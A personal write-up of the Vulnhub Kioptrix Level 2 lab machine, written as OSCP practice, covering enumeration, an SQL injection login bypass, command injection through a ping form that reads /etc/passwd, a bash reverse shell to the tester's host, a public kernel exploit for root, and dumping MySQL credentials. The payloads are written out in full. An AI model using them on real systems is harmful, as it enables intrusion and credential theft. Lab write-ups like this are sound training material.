Vulnhub | Kioptrix Level 2

Anas Ibrahim
5 min readSep 15, 2022

--

Kioptrix level 2

Welcome back

It’s time for level 2 . This write-up is for those who’re preparing for the OSCP exam , and to improve my documentation skills along the way . Follow along.

Machine link : Kioptrix level 2

My Methodology : (IP address — Service Enumeration — Web server enumeration — SQLi — Command injection — Reverse shell — Privilege escalation)

IP address

after installing the machine in your VMware , I want to know the IP address of it , So i used netdiscover command which built-in kali to know the live hosts on my network

netdiscover command so , the IP was 192.168.1.3

another method to know the live hosts , i used my bash script using nmap to grep the live IPs

#!/bin/bashnmap -sP 192.168.1.1/24 | grep "for" | cut -d " " -f 5
192.168.1.3

Service Enumeration

I will use nmap tool to enumerate the ports/services , so i will use the following command

sudo nmap -sV 192.168.1.3 -o scan  
  • sV: Probe open ports to determine service/version info
  • -o : save the output in file
nmap scan

SSH Enumeration

service’s version : OpenSSH 3.9p1

I used searchsploit to search for public vulnerabilities to this version and i found nothing about it.

Web service enumeration

Service’s version on port 80 : Apache httpd 2.0.52 ((centos)) , i will use nikto to get more information

Unfortunaltely i found nothing on port 443 to scan

Port 80 is where all the actions lies

Server : Apache/2.0.52 ((centos))

I will do directory fuzzing using dirsearch by using the following command

dirsearch -u http://192.168.1.3 --full-url --exclude-status=404,403,401,500

— exclude-status : Exclude status codes, separated by commas, support
ranges (Example: 301,500–599)

dirsearch tool

SQli

So , i will navigate to http://192.168.1.3 in my browser and i found remote system administration login page

admin login

I clicked on view page source to see if anything interesting and i found that the user is administrator

page source

first thing i will try sqli in the username and i will balance the query to exploit this vulnerability

I entered this balance query in username without any password and it succeeded

administrator’ or 1=1 — -

exploiting sqli

Command injection

So i found that next page had ping function which required you to give it an IP to ping it , so i entered 127.0.0.1 and it pinged to the ip with 3 times maybe the command used -c 3 , let’s try to get command injection

i will concatenate with the ip command to execute both of them using ;

apache user

Command injection leads to LFI

So i can try to read /etc/passwd to see all the users exists in the system using the following command ;cat /etc/passwd

LFI

So i found that there were 2 users (john — harold)

i was trying to get the private key of them to connect ssh but i didn’t have the permission to do this

listing home directory

Command injection leads to RCE

I will use netcat to get reverse shell using pentestermonkey and i inject the following command ;bash -i >& /dev/tcp/192.168.1.6/4444 0>&1

get shell with apache user

Privilege escalation

The best way to check Redhat version is using cat /etc/os-release command. All we need is to open the terminal and type cat /etc/os-release. It will list the Redhat OS distribution name and release version information. so i write the following command cat /etc/redhat-release

redhat release

I will searchsploit about Centos 4.5 to know if this version has privilege escalation public vulnerability or not

searchsploit centos 4.5
privilege escalation

So , i want to upload this exploit 9542.c to the machine to try it to get root access .

privilege escalation

searchsploit -p 9542.c -> to know the path of this exploit

sudo cp PATH . -> to copy the exploit to my current directory

python3 -m http.server -> to deploy a web server

then go to the machine and navigate to /tmp to download the exploit

the file saved as 9542.c.1 because the previous one saved as 9542.c

After downloading the exploit , compile it and execute using the following command gcc 9542.c -o 9542

get root access

Exploiting mysql

I navigated to /var/www/html to see the source code of index.php which has the database queries

index.php

I found that the database name was webapp , then username = john & password = Hiroshima, i will try to connect with these creds on mysql using the following command

mysql -u john -h localhost -p hiroshima
exploiting mysql

In our machine the used database called webapp , so try to dump all the users exists in the database.

dumping database

Changing password to connect to the original machine (kioptrix 2)

passwd
Changing password for user root.
New UNIX password: root
BAD PASSWORD: it is too short
Retype new UNIX password: root
passwd: all authentication tokens updated successfully.

then i connect to kioptrix 2 with username = root & new password = root

Congratulations, Machine hacked done.

Contact : LinkedIn

--

--

Anas Ibrahim
Anas Ibrahim

No responses yet